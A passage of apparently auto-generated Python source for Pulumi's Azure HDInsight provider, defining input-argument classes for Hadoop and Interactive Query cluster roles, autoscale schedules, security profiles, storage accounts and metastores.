                 subnet_id: Optional[pulumi.Input[str]] = None,
                 virtual_network_id: Optional[pulumi.Input[str]] = None):
        """
        Worker-node role configuration for an HDInsight Hadoop cluster.

        :param pulumi.Input[int] target_instance_count: The number of instances which should be run for the Worker Nodes.
        :param pulumi.Input[str] username: The Username of the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleArgs'] autoscale: A `autoscale` block as defined below.
        :param pulumi.Input[int] min_instance_count: The minimum number of instances which should be run for the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The Password associated with the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
        :param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "target_instance_count", target_instance_count)
        pulumi.set(__self__, "username", username)
        pulumi.set(__self__, "vm_size", vm_size)
        if autoscale is not None:
            pulumi.set(__self__, "autoscale", autoscale)
        if min_instance_count is not None:
            # Deprecated upstream: warn the caller, but keep storing the
            # value for backward compatibility until the provider drops it.
            # (Previously this condition was tested twice back-to-back;
            # merged into a single guard.)
            warnings.warn("""this has been deprecated from the API and will be removed in version 3.0 of the provider""", DeprecationWarning)
            pulumi.log.warn("""min_instance_count is deprecated: this has been deprecated from the API and will be removed in version 3.0 of the provider""")
            pulumi.set(__self__, "min_instance_count", min_instance_count)
        if password is not None:
            pulumi.set(__self__, "password", password)
        if ssh_keys is not None:
            pulumi.set(__self__, "ssh_keys", ssh_keys)
        if subnet_id is not None:
            pulumi.set(__self__, "subnet_id", subnet_id)
        if virtual_network_id is not None:
            pulumi.set(__self__, "virtual_network_id", virtual_network_id)

    @property
    @pulumi.getter(name="targetInstanceCount")
    def target_instance_count(self) -> pulumi.Input[int]:
        """
        The number of instances which should be run for the Worker Nodes.
        """
        return pulumi.get(self, "target_instance_count")

    @target_instance_count.setter
    def target_instance_count(self, value: pulumi.Input[int]):
        pulumi.set(self, "target_instance_count", value)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """
        The Username of the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)

    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> pulumi.Input[str]:
        """
        The Size of the Virtual Machine which should be used as the Worker Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "vm_size")

    @vm_size.setter
    def vm_size(self, value: pulumi.Input[str]):
        pulumi.set(self, "vm_size", value)

    @property
    @pulumi.getter
    def autoscale(self) -> Optional[pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleArgs']]:
        """
        A `autoscale` block as defined below.
        """
        return pulumi.get(self, "autoscale")

    @autoscale.setter
    def autoscale(self, value: Optional[pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleArgs']]):
        pulumi.set(self, "autoscale", value)

    @property
    @pulumi.getter(name="minInstanceCount")
    def min_instance_count(self) -> Optional[pulumi.Input[int]]:
        """
        The minimum number of instances which should be run for the Worker Nodes. Changing this forces a new resource to be created.
        Deprecated: this has been deprecated from the API and will be removed in version 3.0 of the provider.
        """
        return pulumi.get(self, "min_instance_count")

    @min_instance_count.setter
    def min_instance_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "min_instance_count", value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """
        The Password associated with the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter(name="sshKeys")
    def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        A list of SSH Keys which should be used for the local administrator on the Worker Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "ssh_keys")

    @ssh_keys.setter
    def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "ssh_keys", value)

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Subnet within the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "subnet_id")

    @subnet_id.setter
    def subnet_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_id", value)

    @property
    @pulumi.getter(name="virtualNetworkId")
    def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "virtual_network_id")

    @virtual_network_id.setter
    def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class HadoopClusterRolesWorkerNodeAutoscaleArgs:
    def __init__(__self__, *,
                 capacity: Optional[pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleCapacityArgs']] = None,
                 recurrence: Optional[pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleRecurrenceArgs']] = None):
        """
        Autoscale configuration for the worker-node role.

        :param pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleCapacityArgs'] capacity: A `capacity` block as defined below.
        :param pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleRecurrenceArgs'] recurrence: A `recurrence` block as defined below.
        """
        # Both modes are optional; only persist what the caller supplied.
        for prop_name, prop_value in (("capacity", capacity),
                                      ("recurrence", recurrence)):
            if prop_value is not None:
                pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter
    def capacity(self) -> Optional[pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleCapacityArgs']]:
        """A `capacity` block as defined below."""
        return pulumi.get(self, "capacity")

    @capacity.setter
    def capacity(self, value: Optional[pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleCapacityArgs']]):
        pulumi.set(self, "capacity", value)

    @property
    @pulumi.getter
    def recurrence(self) -> Optional[pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleRecurrenceArgs']]:
        """A `recurrence` block as defined below."""
        return pulumi.get(self, "recurrence")

    @recurrence.setter
    def recurrence(self, value: Optional[pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleRecurrenceArgs']]):
        pulumi.set(self, "recurrence", value)
@pulumi.input_type
class HadoopClusterRolesWorkerNodeAutoscaleCapacityArgs:
    def __init__(__self__, *,
                 max_instance_count: pulumi.Input[int],
                 min_instance_count: pulumi.Input[int]):
        """
        Load-based autoscale capacity bounds for the worker-node role.

        :param pulumi.Input[int] max_instance_count: The maximum number of worker nodes to autoscale to based on the cluster's activity.
        :param pulumi.Input[int] min_instance_count: The minimum number of worker nodes to autoscale to based on the cluster's activity.
        """
        # Both bounds are required, so they are stored unconditionally.
        for prop_name, prop_value in (
                ("max_instance_count", max_instance_count),
                ("min_instance_count", min_instance_count)):
            pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter(name="maxInstanceCount")
    def max_instance_count(self) -> pulumi.Input[int]:
        """The maximum number of worker nodes to autoscale to based on the cluster's activity."""
        return pulumi.get(self, "max_instance_count")

    @max_instance_count.setter
    def max_instance_count(self, value: pulumi.Input[int]):
        pulumi.set(self, "max_instance_count", value)

    @property
    @pulumi.getter(name="minInstanceCount")
    def min_instance_count(self) -> pulumi.Input[int]:
        """The minimum number of worker nodes to autoscale to based on the cluster's activity."""
        return pulumi.get(self, "min_instance_count")

    @min_instance_count.setter
    def min_instance_count(self, value: pulumi.Input[int]):
        pulumi.set(self, "min_instance_count", value)
@pulumi.input_type
class HadoopClusterRolesWorkerNodeAutoscaleRecurrenceArgs:
    def __init__(__self__, *,
                 schedules: pulumi.Input[Sequence[pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]],
                 timezone: pulumi.Input[str]):
        """
        Schedule-based autoscale recurrence for the worker-node role.

        :param pulumi.Input[Sequence[pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]] schedules: A list of `schedule` blocks as defined below.
        :param pulumi.Input[str] timezone: The time zone for the autoscale schedule times.
        """
        # Both fields are required, so they are stored unconditionally.
        for prop_name, prop_value in (("schedules", schedules),
                                      ("timezone", timezone)):
            pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter
    def schedules(self) -> pulumi.Input[Sequence[pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]]:
        """A list of `schedule` blocks as defined below."""
        return pulumi.get(self, "schedules")

    @schedules.setter
    def schedules(self, value: pulumi.Input[Sequence[pulumi.Input['HadoopClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]]):
        pulumi.set(self, "schedules", value)

    @property
    @pulumi.getter
    def timezone(self) -> pulumi.Input[str]:
        """The time zone for the autoscale schedule times."""
        return pulumi.get(self, "timezone")

    @timezone.setter
    def timezone(self, value: pulumi.Input[str]):
        pulumi.set(self, "timezone", value)
@pulumi.input_type
class HadoopClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs:
    def __init__(__self__, *,
                 days: pulumi.Input[Sequence[pulumi.Input[str]]],
                 target_instance_count: pulumi.Input[int],
                 time: pulumi.Input[str]):
        """
        One autoscale schedule entry (days, time of day, node count).

        :param pulumi.Input[Sequence[pulumi.Input[str]]] days: The days of the week to perform autoscale.
        :param pulumi.Input[int] target_instance_count: The number of worker nodes to autoscale at the specified time.
        :param pulumi.Input[str] time: The time of day to perform the autoscale in 24hour format.
        """
        # All three fields are required, so they are stored unconditionally.
        for prop_name, prop_value in (
                ("days", days),
                ("target_instance_count", target_instance_count),
                ("time", time)):
            pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter
    def days(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
        """The days of the week to perform autoscale."""
        return pulumi.get(self, "days")

    @days.setter
    def days(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
        pulumi.set(self, "days", value)

    @property
    @pulumi.getter(name="targetInstanceCount")
    def target_instance_count(self) -> pulumi.Input[int]:
        """The number of worker nodes to autoscale at the specified time."""
        return pulumi.get(self, "target_instance_count")

    @target_instance_count.setter
    def target_instance_count(self, value: pulumi.Input[int]):
        pulumi.set(self, "target_instance_count", value)

    @property
    @pulumi.getter
    def time(self) -> pulumi.Input[str]:
        """The time of day to perform the autoscale in 24hour format."""
        return pulumi.get(self, "time")

    @time.setter
    def time(self, value: pulumi.Input[str]):
        pulumi.set(self, "time", value)
@pulumi.input_type
class HadoopClusterRolesZookeeperNodeArgs:
    def __init__(__self__, *,
                 username: pulumi.Input[str],
                 vm_size: pulumi.Input[str],
                 password: Optional[pulumi.Input[str]] = None,
                 ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 subnet_id: Optional[pulumi.Input[str]] = None,
                 virtual_network_id: Optional[pulumi.Input[str]] = None):
        """
        Zookeeper-node role configuration for an HDInsight Hadoop cluster.

        :param pulumi.Input[str] username: The Username of the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Zookeeper Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The Password associated with the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
        :param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "username", username)
        pulumi.set(__self__, "vm_size", vm_size)
        # Optional settings are stored only when explicitly supplied.
        for prop_name, prop_value in (
                ("password", password),
                ("ssh_keys", ssh_keys),
                ("subnet_id", subnet_id),
                ("virtual_network_id", virtual_network_id)):
            if prop_value is not None:
                pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """The Username of the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)

    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> pulumi.Input[str]:
        """The Size of the Virtual Machine which should be used as the Zookeeper Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "vm_size")

    @vm_size.setter
    def vm_size(self, value: pulumi.Input[str]):
        pulumi.set(self, "vm_size", value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """The Password associated with the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter(name="sshKeys")
    def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """A list of SSH Keys which should be used for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "ssh_keys")

    @ssh_keys.setter
    def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "ssh_keys", value)

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[pulumi.Input[str]]:
        """The ID of the Subnet within the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created."""
        return pulumi.get(self, "subnet_id")

    @subnet_id.setter
    def subnet_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_id", value)

    @property
    @pulumi.getter(name="virtualNetworkId")
    def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
        """The ID of the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created."""
        return pulumi.get(self, "virtual_network_id")

    @virtual_network_id.setter
    def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class HadoopClusterSecurityProfileArgs:
    def __init__(__self__, *,
                 aadds_resource_id: pulumi.Input[str],
                 domain_name: pulumi.Input[str],
                 domain_user_password: pulumi.Input[str],
                 domain_username: pulumi.Input[str],
                 ldaps_urls: pulumi.Input[Sequence[pulumi.Input[str]]],
                 msi_resource_id: pulumi.Input[str],
                 cluster_users_group_dns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
        """
        Enterprise Security Package (Azure AD DS) settings for the cluster.

        :param pulumi.Input[str] aadds_resource_id: The resource ID of the Azure Active Directory Domain Service. Changing this forces a new resource to be created.
        :param pulumi.Input[str] domain_name: The name of the Azure Active Directory Domain. Changing this forces a new resource to be created.
        :param pulumi.Input[str] domain_user_password: The user password of the Azure Active Directory Domain. Changing this forces a new resource to be created.
        :param pulumi.Input[str] domain_username: The username of the Azure Active Directory Domain. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ldaps_urls: A list of the LDAPS URLs to communicate with the Azure Active Directory. Changing this forces a new resource to be created.
        :param pulumi.Input[str] msi_resource_id: The User Assigned Identity for the HDInsight Cluster. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] cluster_users_group_dns: A list of the distinguished names for the cluster user groups. Changing this forces a new resource to be created.
        """
        # All mandatory domain-join fields are stored unconditionally.
        for prop_name, prop_value in (
                ("aadds_resource_id", aadds_resource_id),
                ("domain_name", domain_name),
                ("domain_user_password", domain_user_password),
                ("domain_username", domain_username),
                ("ldaps_urls", ldaps_urls),
                ("msi_resource_id", msi_resource_id)):
            pulumi.set(__self__, prop_name, prop_value)
        # Group DNs are optional and only stored when provided.
        if cluster_users_group_dns is not None:
            pulumi.set(__self__, "cluster_users_group_dns", cluster_users_group_dns)

    @property
    @pulumi.getter(name="aaddsResourceId")
    def aadds_resource_id(self) -> pulumi.Input[str]:
        """The resource ID of the Azure Active Directory Domain Service. Changing this forces a new resource to be created."""
        return pulumi.get(self, "aadds_resource_id")

    @aadds_resource_id.setter
    def aadds_resource_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "aadds_resource_id", value)

    @property
    @pulumi.getter(name="domainName")
    def domain_name(self) -> pulumi.Input[str]:
        """The name of the Azure Active Directory Domain. Changing this forces a new resource to be created."""
        return pulumi.get(self, "domain_name")

    @domain_name.setter
    def domain_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "domain_name", value)

    @property
    @pulumi.getter(name="domainUserPassword")
    def domain_user_password(self) -> pulumi.Input[str]:
        """The user password of the Azure Active Directory Domain. Changing this forces a new resource to be created."""
        return pulumi.get(self, "domain_user_password")

    @domain_user_password.setter
    def domain_user_password(self, value: pulumi.Input[str]):
        pulumi.set(self, "domain_user_password", value)

    @property
    @pulumi.getter(name="domainUsername")
    def domain_username(self) -> pulumi.Input[str]:
        """The username of the Azure Active Directory Domain. Changing this forces a new resource to be created."""
        return pulumi.get(self, "domain_username")

    @domain_username.setter
    def domain_username(self, value: pulumi.Input[str]):
        pulumi.set(self, "domain_username", value)

    @property
    @pulumi.getter(name="ldapsUrls")
    def ldaps_urls(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
        """A list of the LDAPS URLs to communicate with the Azure Active Directory. Changing this forces a new resource to be created."""
        return pulumi.get(self, "ldaps_urls")

    @ldaps_urls.setter
    def ldaps_urls(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
        pulumi.set(self, "ldaps_urls", value)

    @property
    @pulumi.getter(name="msiResourceId")
    def msi_resource_id(self) -> pulumi.Input[str]:
        """The User Assigned Identity for the HDInsight Cluster. Changing this forces a new resource to be created."""
        return pulumi.get(self, "msi_resource_id")

    @msi_resource_id.setter
    def msi_resource_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "msi_resource_id", value)

    @property
    @pulumi.getter(name="clusterUsersGroupDns")
    def cluster_users_group_dns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """A list of the distinguished names for the cluster user groups. Changing this forces a new resource to be created."""
        return pulumi.get(self, "cluster_users_group_dns")

    @cluster_users_group_dns.setter
    def cluster_users_group_dns(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "cluster_users_group_dns", value)
@pulumi.input_type
class HadoopClusterStorageAccountArgs:
    def __init__(__self__, *,
                 is_default: pulumi.Input[bool],
                 storage_account_key: pulumi.Input[str],
                 storage_container_id: pulumi.Input[str]):
        """
        :param pulumi.Input[bool] is_default: Is this the Default Storage Account for the HDInsight Hadoop Cluster? Changing this forces a new resource to be created.
        :param pulumi.Input[str] storage_account_key: The Access Key which should be used to connect to the Storage Account. Changing this forces a new resource to be created.
        :param pulumi.Input[str] storage_container_id: The ID of the Storage Container. Changing this forces a new resource to be created.
        """
        # All three arguments are required; register them on the args bag.
        for key, arg in (("is_default", is_default),
                         ("storage_account_key", storage_account_key),
                         ("storage_container_id", storage_container_id)):
            pulumi.set(__self__, key, arg)

    @property
    @pulumi.getter(name="isDefault")
    def is_default(self) -> pulumi.Input[bool]:
        """Is this the Default Storage Account for the HDInsight Hadoop Cluster? Changing this forces a new resource to be created."""
        return pulumi.get(self, "is_default")

    @is_default.setter
    def is_default(self, value: pulumi.Input[bool]):
        pulumi.set(self, "is_default", value)

    @property
    @pulumi.getter(name="storageAccountKey")
    def storage_account_key(self) -> pulumi.Input[str]:
        """The Access Key which should be used to connect to the Storage Account. Changing this forces a new resource to be created."""
        return pulumi.get(self, "storage_account_key")

    @storage_account_key.setter
    def storage_account_key(self, value: pulumi.Input[str]):
        pulumi.set(self, "storage_account_key", value)

    @property
    @pulumi.getter(name="storageContainerId")
    def storage_container_id(self) -> pulumi.Input[str]:
        """The ID of the Storage Container. Changing this forces a new resource to be created."""
        return pulumi.get(self, "storage_container_id")

    @storage_container_id.setter
    def storage_container_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "storage_container_id", value)
@pulumi.input_type
class HadoopClusterStorageAccountGen2Args:
    def __init__(__self__, *,
                 filesystem_id: pulumi.Input[str],
                 is_default: pulumi.Input[bool],
                 managed_identity_resource_id: pulumi.Input[str],
                 storage_resource_id: pulumi.Input[str]):
        """
        :param pulumi.Input[str] filesystem_id: The ID of the Gen2 Filesystem. Changing this forces a new resource to be created.
        :param pulumi.Input[bool] is_default: Is this the Default Storage Account for the HDInsight Hadoop Cluster? Changing this forces a new resource to be created.
        :param pulumi.Input[str] managed_identity_resource_id: The ID of Managed Identity to use for accessing the Gen2 filesystem. Changing this forces a new resource to be created.
        :param pulumi.Input[str] storage_resource_id: The ID of the Storage Account. Changing this forces a new resource to be created.
        """
        # Every Gen2 storage argument is mandatory; register each one.
        for key, arg in (("filesystem_id", filesystem_id),
                         ("is_default", is_default),
                         ("managed_identity_resource_id", managed_identity_resource_id),
                         ("storage_resource_id", storage_resource_id)):
            pulumi.set(__self__, key, arg)

    @property
    @pulumi.getter(name="filesystemId")
    def filesystem_id(self) -> pulumi.Input[str]:
        """The ID of the Gen2 Filesystem. Changing this forces a new resource to be created."""
        return pulumi.get(self, "filesystem_id")

    @filesystem_id.setter
    def filesystem_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "filesystem_id", value)

    @property
    @pulumi.getter(name="isDefault")
    def is_default(self) -> pulumi.Input[bool]:
        """Is this the Default Storage Account for the HDInsight Hadoop Cluster? Changing this forces a new resource to be created."""
        return pulumi.get(self, "is_default")

    @is_default.setter
    def is_default(self, value: pulumi.Input[bool]):
        pulumi.set(self, "is_default", value)

    @property
    @pulumi.getter(name="managedIdentityResourceId")
    def managed_identity_resource_id(self) -> pulumi.Input[str]:
        """The ID of Managed Identity to use for accessing the Gen2 filesystem. Changing this forces a new resource to be created."""
        return pulumi.get(self, "managed_identity_resource_id")

    @managed_identity_resource_id.setter
    def managed_identity_resource_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "managed_identity_resource_id", value)

    @property
    @pulumi.getter(name="storageResourceId")
    def storage_resource_id(self) -> pulumi.Input[str]:
        """The ID of the Storage Account. Changing this forces a new resource to be created."""
        return pulumi.get(self, "storage_resource_id")

    @storage_resource_id.setter
    def storage_resource_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "storage_resource_id", value)
@pulumi.input_type
class InteractiveQueryClusterComponentVersionArgs:
    def __init__(__self__, *,
                 interactive_hive: pulumi.Input[str]):
        """
        :param pulumi.Input[str] interactive_hive: The Interactive Hive component version for the cluster.
        """
        pulumi.set(__self__, "interactive_hive", interactive_hive)

    @property
    @pulumi.getter(name="interactiveHive")
    def interactive_hive(self) -> pulumi.Input[str]:
        """The Interactive Hive component version for the cluster."""
        return pulumi.get(self, "interactive_hive")

    @interactive_hive.setter
    def interactive_hive(self, value: pulumi.Input[str]):
        pulumi.set(self, "interactive_hive", value)
@pulumi.input_type
class InteractiveQueryClusterGatewayArgs:
    def __init__(__self__, *,
                 password: pulumi.Input[str],
                 username: pulumi.Input[str],
                 enabled: Optional[pulumi.Input[bool]] = None):
        """
        :param pulumi.Input[str] password: The password used for the Ambari Portal.
        :param pulumi.Input[str] username: The username used for the Ambari Portal. Changing this forces a new resource to be created.
        :param pulumi.Input[bool] enabled: Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore.
        """
        pulumi.set(__self__, "password", password)
        pulumi.set(__self__, "username", username)
        if enabled is not None:
            # `enabled` is deprecated (the HDInsight API no longer supports
            # disabling the gateway); warn, but still record the value so
            # existing callers keep working.
            warnings.warn("""HDInsight doesn't support disabling gateway anymore""", DeprecationWarning)
            pulumi.log.warn("""enabled is deprecated: HDInsight doesn't support disabling gateway anymore""")
            pulumi.set(__self__, "enabled", enabled)

    @property
    @pulumi.getter
    def password(self) -> pulumi.Input[str]:
        """
        The password used for the Ambari Portal.
        """
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: pulumi.Input[str]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """
        The username used for the Ambari Portal. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)

    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore.
        """
        return pulumi.get(self, "enabled")

    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)
@pulumi.input_type
class InteractiveQueryClusterMetastoresArgs:
    def __init__(__self__, *,
                 ambari: Optional[pulumi.Input['InteractiveQueryClusterMetastoresAmbariArgs']] = None,
                 hive: Optional[pulumi.Input['InteractiveQueryClusterMetastoresHiveArgs']] = None,
                 oozie: Optional[pulumi.Input['InteractiveQueryClusterMetastoresOozieArgs']] = None):
        """
        :param pulumi.Input['InteractiveQueryClusterMetastoresAmbariArgs'] ambari: An `ambari` block as defined below.
        :param pulumi.Input['InteractiveQueryClusterMetastoresHiveArgs'] hive: A `hive` block as defined below.
        :param pulumi.Input['InteractiveQueryClusterMetastoresOozieArgs'] oozie: An `oozie` block as defined below.
        """
        # Each metastore block is optional; only register the ones provided.
        for key, arg in (("ambari", ambari), ("hive", hive), ("oozie", oozie)):
            if arg is not None:
                pulumi.set(__self__, key, arg)

    @property
    @pulumi.getter
    def ambari(self) -> Optional[pulumi.Input['InteractiveQueryClusterMetastoresAmbariArgs']]:
        """An `ambari` block as defined below."""
        return pulumi.get(self, "ambari")

    @ambari.setter
    def ambari(self, value: Optional[pulumi.Input['InteractiveQueryClusterMetastoresAmbariArgs']]):
        pulumi.set(self, "ambari", value)

    @property
    @pulumi.getter
    def hive(self) -> Optional[pulumi.Input['InteractiveQueryClusterMetastoresHiveArgs']]:
        """A `hive` block as defined below."""
        return pulumi.get(self, "hive")

    @hive.setter
    def hive(self, value: Optional[pulumi.Input['InteractiveQueryClusterMetastoresHiveArgs']]):
        pulumi.set(self, "hive", value)

    @property
    @pulumi.getter
    def oozie(self) -> Optional[pulumi.Input['InteractiveQueryClusterMetastoresOozieArgs']]:
        """An `oozie` block as defined below."""
        return pulumi.get(self, "oozie")

    @oozie.setter
    def oozie(self, value: Optional[pulumi.Input['InteractiveQueryClusterMetastoresOozieArgs']]):
        pulumi.set(self, "oozie", value)
@pulumi.input_type
class InteractiveQueryClusterMetastoresAmbariArgs:
    def __init__(__self__, *,
                 database_name: pulumi.Input[str],
                 password: pulumi.Input[str],
                 server: pulumi.Input[str],
                 username: pulumi.Input[str]):
        """
        :param pulumi.Input[str] database_name: The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The external Ambari metastore's existing SQL server admin password. Changing this forces a new resource to be created.
        :param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Ambari metastore. Changing this forces a new resource to be created.
        :param pulumi.Input[str] username: The external Ambari metastore's existing SQL server admin username. Changing this forces a new resource to be created.
        """
        # All Ambari metastore connection settings are required.
        for key, arg in (("database_name", database_name), ("password", password),
                         ("server", server), ("username", username)):
            pulumi.set(__self__, key, arg)

    @property
    @pulumi.getter(name="databaseName")
    def database_name(self) -> pulumi.Input[str]:
        """The external Hive metastore's existing SQL database. Changing this forces a new resource to be created."""
        return pulumi.get(self, "database_name")

    @database_name.setter
    def database_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "database_name", value)

    @property
    @pulumi.getter
    def password(self) -> pulumi.Input[str]:
        """The external Ambari metastore's existing SQL server admin password. Changing this forces a new resource to be created."""
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: pulumi.Input[str]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter
    def server(self) -> pulumi.Input[str]:
        """The fully-qualified domain name (FQDN) of the SQL server to use for the external Ambari metastore. Changing this forces a new resource to be created."""
        return pulumi.get(self, "server")

    @server.setter
    def server(self, value: pulumi.Input[str]):
        pulumi.set(self, "server", value)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """The external Ambari metastore's existing SQL server admin username. Changing this forces a new resource to be created."""
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)
@pulumi.input_type
class InteractiveQueryClusterMetastoresHiveArgs:
    def __init__(__self__, *,
                 database_name: pulumi.Input[str],
                 password: pulumi.Input[str],
                 server: pulumi.Input[str],
                 username: pulumi.Input[str]):
        """
        :param pulumi.Input[str] database_name: The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The external Hive metastore's existing SQL server admin password. Changing this forces a new resource to be created.
        :param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Hive metastore. Changing this forces a new resource to be created.
        :param pulumi.Input[str] username: The external Hive metastore's existing SQL server admin username. Changing this forces a new resource to be created.
        """
        # All Hive metastore connection settings are required.
        for key, arg in (("database_name", database_name), ("password", password),
                         ("server", server), ("username", username)):
